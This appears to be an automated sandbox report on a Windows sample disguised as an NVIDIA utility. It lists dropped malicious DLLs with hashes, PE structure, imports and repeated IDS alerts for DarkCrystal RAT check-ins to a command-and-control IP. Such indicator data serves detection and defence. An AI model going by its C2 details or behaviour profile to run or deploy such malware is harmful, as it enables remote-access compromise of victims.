Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\snUoPbCy.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ukwwlbRt.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xYhnoKfH.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zwfUdEOY.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.826029707357766
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXAQvdtv3fvFAqvpay6vj:Vx993DEUphu8
MD5:	CB697D36CCB76C1CC97B47402C034692
SHA1:	0CC726401987825F2AE9655D5378335B01D75B99
SHA-256:	39792408235B733426B40F5E9BFB206BC20FC10E08D15BA652C10644A7556512
SHA-512:	E7DE1E31C34C9633593090518B373D35CF27ED20371B3C3AFF81FAB8E2FD8907CA5987460BB2B1F1C7359B89C7A7E1421DB51A7417230987DED4625EBC2947FE
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 13/01/2025 08:46:40..08:46:40, error: 0x80072746.08:46:45, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.448107762904028
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NVIDIAShare.exe.bin.exe
File size:	2'356'395 bytes
MD5:	c9feda13f449c852ee9b95967bdfd3de
SHA1:	015bf16040a779d85521d5296b6ed27d1e761e70
SHA256:	ea0dec7cb08637c829b8c4d08439524e9c1ad5a7116e6cfd8780b533809bff72
SHA512:	13664b8906c718673ce21194141c68f045a3ef925e9998fa44e1af9623b9a641e87afe0523d846b316c18f557e897ae980987e0fb27b856e0015d77e4242aac6
SSDEEP:	49152:nBJV2ul0wFSe3LBPCLPN7KNt6joVQj8Axv02AcY7e0:Bmi07e7BPClKNt6joVQj3R+e0
TLSH:	E9B59E119D93CDF3C6A63B3F8497082A41EDD7622613DBD77B0A19B1BA412639F121E3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	0cd3c0cad8c13244

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FA3D123921Bh
jmp 00007FA3D1238B2Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FA3D122B977h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FA3D123BFBFh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FA3D1238CBCh
push 0000000Ch
push esi
call 00007FA3D1238279h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FA3D122B8F2h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FA3D123BA79h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FA3D1238C38h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FA3D123BA5Ch
int3
jmp 00007FA3D123D4F7h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x25a04	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0x25a04	0x25c00	0aeee64ff4e5b648aa004ae79050732d	False	0.2716848613410596	data	5.055524641299278	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64734	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6527c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66828	0x2a17	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9395823665893271
RT_ICON	0x69240	0x4c28	Device independent bitmap graphic, 128 x 256 x 8, image size 16384, 256 important colors			0.09643003693065244
RT_ICON	0x6de68	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors			0.18523454157782515
RT_ICON	0x6ed10	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.24458483754512636
RT_ICON	0x6f5b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors			0.23444700460829493
RT_ICON	0x6fc80	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors			0.2203757225433526
RT_ICON	0x701e8	0x27cb	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9359968587415334
RT_ICON	0x729b4	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584			0.06272920856500651
RT_ICON	0x831dc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.11639004149377594
RT_ICON	0x85784	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.14845215759849906
RT_ICON	0x8682c	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.19836065573770492
RT_ICON	0x871b4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.22783687943262412
RT_DIALOG	0x8761c	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x878a4	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x879e0	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x87acc	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x87bfc	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x87f34	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x88188	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x8836c	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x88538	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x886f0	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x88838	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x88ca4	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x88e0c	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x88f60	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x8906c	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x89128	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x89200	0xae	data			0.6264367816091954
RT_MANIFEST	0x892b0	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T13:37:13.005589+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49704	104.21.64.1	80	TCP
2025-01-13T13:37:24.896291+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49745	104.21.64.1	80	TCP
2025-01-13T13:37:32.865040+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49796	104.21.64.1	80	TCP
2025-01-13T13:37:44.818204+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49872	104.21.64.1	80	TCP
2025-01-13T13:37:52.443231+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49919	104.21.64.1	80	TCP
2025-01-13T13:38:05.240142+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49980	104.21.64.1	80	TCP
2025-01-13T13:38:13.349540+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49981	104.21.64.1	80	TCP
2025-01-13T13:38:21.365330+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49982	104.21.64.1	80	TCP
2025-01-13T13:38:33.693350+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49983	104.21.64.1	80	TCP
2025-01-13T13:38:40.990270+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49984	104.21.64.1	80	TCP
2025-01-13T13:38:52.193443+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49985	104.21.64.1	80	TCP
2025-01-13T13:39:03.101484+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49986	104.21.64.1	80	TCP
2025-01-13T13:39:09.880948+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49987	104.21.64.1	80	TCP
2025-01-13T13:39:21.068494+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49988	104.21.64.1	80	TCP
2025-01-13T13:39:31.990406+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49989	104.21.64.1	80	TCP
2025-01-13T13:39:54.443563+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49991	104.21.64.1	80	TCP
2025-01-13T13:40:05.537339+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49992	104.21.64.1	80	TCP
2025-01-13T13:40:12.349847+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49993	104.21.64.1	80	TCP
2025-01-13T13:40:23.318637+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49994	104.21.64.1	80	TCP
2025-01-13T13:40:34.318680+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49995	104.21.64.1	80	TCP
2025-01-13T13:40:45.506195+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49996	104.21.64.1	80	TCP
2025-01-13T13:40:56.849991+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49997	104.21.64.1	80	TCP
2025-01-13T13:41:07.849998+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49998	104.21.64.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:37:12.445538998 CET	49704	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:12.450380087 CET	80	49704	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:12.450557947 CET	49704	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:12.451575994 CET	49704	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:12.456389904 CET	80	49704	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:12.803474903 CET	49704	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:12.808387041 CET	80	49704	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:12.902009964 CET	80	49704	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:13.005589008 CET	49704	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:13.141153097 CET	80	49704	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:13.193099022 CET	49704	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:13.603468895 CET	49704	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:24.394212961 CET	49745	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:24.399111986 CET	80	49745	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:24.399219036 CET	49745	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:24.403089046 CET	49745	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:24.407861948 CET	80	49745	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:24.770590067 CET	49745	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:24.775369883 CET	80	49745	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:24.851700068 CET	80	49745	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:24.896291018 CET	49745	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:25.096684933 CET	80	49745	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:25.146246910 CET	49745	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:25.552248001 CET	49745	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:32.326941967 CET	49796	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:32.331909895 CET	80	49796	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:32.332110882 CET	49796	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:32.332403898 CET	49796	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:32.337177992 CET	80	49796	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:32.677859068 CET	49796	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:32.683063030 CET	80	49796	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:32.817519903 CET	80	49796	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:32.865040064 CET	49796	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:33.032058001 CET	80	49796	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:33.083879948 CET	49796	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:33.227210999 CET	49796	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:44.312010050 CET	49872	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:44.317568064 CET	80	49872	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:44.317656040 CET	49872	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:44.318007946 CET	49872	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:44.322745085 CET	80	49872	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:44.662259102 CET	49872	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:44.667233944 CET	80	49872	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:44.766022921 CET	80	49872	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:44.818203926 CET	49872	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:44.993552923 CET	80	49872	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:45.036962986 CET	49872	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:45.253078938 CET	49872	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:51.937145948 CET	49919	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:51.942081928 CET	80	49919	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:51.942163944 CET	49919	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:51.942455053 CET	49919	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:51.947236061 CET	80	49919	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:52.287398100 CET	49919	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:52.292408943 CET	80	49919	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:52.391191959 CET	80	49919	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:52.443231106 CET	49919	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:52.622592926 CET	80	49919	104.21.64.1	192.168.2.5
Jan 13, 2025 13:37:52.661963940 CET	49919	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:37:53.163507938 CET	49919	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:04.738738060 CET	49980	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:04.743609905 CET	80	49980	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:04.746546030 CET	49980	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:04.746824980 CET	49980	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:04.751542091 CET	80	49980	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:05.099750042 CET	49980	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:05.104748011 CET	80	49980	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:05.199692011 CET	80	49980	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:05.240142107 CET	49980	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:05.467933893 CET	80	49980	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:05.521389008 CET	49980	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:05.752505064 CET	49980	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:12.847800016 CET	49981	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:12.852657080 CET	80	49981	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:12.856143951 CET	49981	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:12.856420994 CET	49981	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:12.861128092 CET	80	49981	104.21.64.1	192.168.2.5
